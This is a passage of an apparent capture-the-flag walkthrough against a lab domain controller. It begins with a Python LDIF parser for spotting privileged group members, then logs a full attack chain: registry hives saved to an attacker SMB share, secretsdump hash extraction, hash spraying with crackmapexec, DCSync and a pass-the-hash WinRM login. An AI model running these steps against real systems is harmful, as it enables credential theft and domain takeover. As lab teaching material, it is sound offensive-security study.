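To see which object each memberOf line actually belongs to, here is a small LDIF grouper as an added example (not from the write-up): it unfolds ldapsearch's wrapped continuation lines, groups attributes per entry and reports the high-value groups per account. The LDIF sample is constructed from the group names above; the DNs, the charlie entry and zximena448's RODC-group line are made up for illustration.

```python
"""Attribute ldapsearch memberOf lines to the object they belong to.

Added example, not part of the original write-up. The LDIF sample is
constructed: group names follow the output above, DNs and the extra entries
are invented.
"""

HIGH_VALUE_GROUPS = {
    "Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators",
    "Backup Operators", "Account Operators", "Server Operators",
    "Print Operators", "Group Policy Creator Owners", "DnsAdmins",
}

# Constructed LDIF. Note the wrapped DN: ldapsearch folds at 78 columns and
# marks the continuation with a single leading space.
SAMPLE_LDIF = """\
# extended LDIF
dn: CN=Administrator,CN=Users,DC=SOUPEDECODE,DC=LOCAL
sAMAccountName: Administrator
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Domain Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Enterprise Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Schema Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Administrators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL

dn: CN=zximena448,CN=Users,DC=SOUPEDECODE,DC=LOCAL
sAMAccountName: zximena448
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=SOUPEDECODE,DC=L
 OCAL
memberOf: CN=Backup Operators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL

dn: CN=charlie,CN=Users,DC=SOUPEDECODE,DC=LOCAL
sAMAccountName: charlie
"""


def parse_ldif(text: str) -> list:
    """Return one {attribute: [values]} dict per LDIF entry (base64 '::' values are left as-is)."""
    lines = []
    for raw in text.splitlines():  # 1) unfold: leading space continues the previous line
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, current = [], {}
    for line in lines + [""]:  # 2) entries are separated by blank lines
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        attr, _, value = line.partition(":")
        current.setdefault(attr.strip(), []).append(value.strip())
    return entries


def group_cn(dn: str) -> str:
    """'CN=Backup Operators,CN=Builtin,DC=...' -> 'Backup Operators'."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first


def memberships(text: str) -> dict:
    """sAMAccountName -> list of group CNs taken from that entry's memberOf."""
    result = {}
    for entry in parse_ldif(text):
        if "sAMAccountName" not in entry:
            continue
        result[entry["sAMAccountName"][0]] = [group_cn(dn) for dn in entry.get("memberOf", [])]
    return result


def privileged_members(text: str) -> dict:
    """Accounts that sit in HIGH_VALUE_GROUPS, with the groups that got them there."""
    return {
        user: sorted(set(groups) & HIGH_VALUE_GROUPS)
        for user, groups in memberships(text).items()
        if set(groups) & HIGH_VALUE_GROUPS
    }


if __name__ == "__main__":
    for user, groups in privileged_members(SAMPLE_LDIF).items():
        print(f"{user}: {', '.join(groups)}")
```

Feed it real output with the same -b base and an (objectClass=user) filter instead of the grep, and the Backup Operators line lands next to the account it belongs to rather than at the bottom of an anonymous pile. memberOf only shows direct membership; nested groups need a recursive (memberOf:1.2.840.113556.1.4.1941:=...) query.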
First start an SMB server on Kali to receive the saved hives:
> impacket-smbserver -smb2support "share" .
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
> impacket-reg "soupedecode.local"/"zximena448":"internet"@"192.168.56.126" backup -o '\\192.168.56.104\share'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to \\192.168.56.104\share\SAM.save
[*] Saved HKLM\SYSTEM to \\192.168.56.104\share\SYSTEM.save
[*] Saved HKLM\SECURITY to \\192.168.56.104\share\SECURITY.save
Extract the secrets from the hives with secretsdump in local mode:
> secretsdump.py -system SYSTEM.save -sam SAM.save -security SECURITY.save local
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Target system bootKey: 0x0c7ad5e1334e081c4dfecd5d77cc2fc6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction failed: ('unpack requires a string argument of length 2', "When unpacking field 'PekID | <H=0 | ''[:2]'")
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:7ab9e5f668e4fbdb7661b11a476e69ce1c7a7c0adc4695844049b921cfbe33b5cdb144d2673b6301c78717a275d9002a1056c17be2dbe4f97cbf74ce12d80e3fb51a93305addb136ae910c8fc08d96856531b526db8c7d211d29c25e50ab2f39982e736bb0a8e4a1ca0c0d8ba29747129aabe86dfe17c765f2f867a2225a882f08bd38677e4bf6cbec816721658658f7071884875694d2fd553c1251054896c1eab827f0c5ca2dae2632c0070f442bff837736d1b69ee63c755a6b77944765159c8fcffa7f946c79e045b117f27a1cc669e19add9380e5b16e49215a04c445e1ab673cefa21a17948ea8b3f918b1ea9f
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:967fdb37b05f099f6659ab8196ec4db1
[*] DPAPI_SYSTEM
dpapi_machinekey:0x829d1c0e3b8fdffdc9c86535eac96158d8841cf4
dpapi_userkey:0x4813ee82e68a3bf9fec7813e867b42628ccd9503
[*] NL$KM
0000 44 C5 ED CE F5 0E BF 0C 15 63 8B 8D 2F A3 06 8F D........c../...
0010 62 4D CA D9 55 20 44 41 75 55 3E 85 82 06 21 14 bM..U DAuU>...!.
0020 8E FA A1 77 0A 9C 0D A4 9A 96 44 7C FC 89 63 91 ...w......D|..c.
0030 69 02 53 95 1F ED 0E 77 B5 24 17 BE 6E 80 A9 91 i.S....w.$..n...
NL$KM:44c5edcef50ebf0c15638b8d2fa3068f624dcad95520444175553e85820621148efaa1770a9c0da49a96447cfc896391690253951fed0e77b52417be6e80a991
[*] Cleaning up..
PTH
On a domain controller the local SAM only holds the DSRM account, so the Administrator hash above is not the domain one (the RID 500 hash that comes out of NTDS below is different), and the SAM parse error from this Python 2 Impacket 0.9.20 build can be ignored. The secret that matters is $MACHINE.ACC: the NT hash of the DC's own computer account. Try passing it. Spraying the whole username list is unnecessary, since this hash can only belong to DC01$, but it confirms the account:
> crackmapexec smb 192.168.56.126 -u username.txt -H 967fdb37b05f099f6659ab8196ec4db1
SMB 192.168.56.126 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Enterprise:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Administrator:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Guest:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\krbtgt:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Domain:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Domain:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Domain:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Domain:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Domain:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Cert:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Schema:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Enterprise:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Group:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Read-only:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Cloneable:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Protected:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Key:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Enterprise:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\RAS:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Allowed:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\Denied:967fdb37b05f099f6659ab8196ec4db1 STATUS_LOGON_FAILURE
SMB 192.168.56.126 445 DC01 [+] SOUPEDECODE.LOCAL\DC01$:967fdb37b05f099f6659ab8196ec4db1
DC01$ authenticates. A domain controller's machine account holds the replication rights DCSync relies on, so secretsdump can pull every hash out of NTDS.DIT through DRSUAPI (the rpc_s_access_denied on RemoteOperations below is harmless; that path is only used for the SAM/LSA part):
> secretsdump.py soupedecode.local/'DC01$'@192.168.56.126 -hashes :967fdb37b05f099f6659ab8196ec4db1
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8982babd4da89d33210779a6c5b078bd:::
With Administrator's NT hash, log in over WinRM directly. The first attempt went to the wrong IP (192.168.56.128), hence the EHOSTUNREACH:
> evil-winrm -i 192.168.56.128 -u Administrator -H 8982babd4da89d33210779a6c5b078bd
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type Errno::EHOSTUNREACH happened, message is No route to host - No route to host - connect(2) for "192.168.56.128" port 5985 (192.168.56.128:5985)
Error: Exiting with code 1
> evil-winrm -i 192.168.56.126 -u Administrator -H 8982babd4da89d33210779a6c5b078bd
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
soupedecode\administrator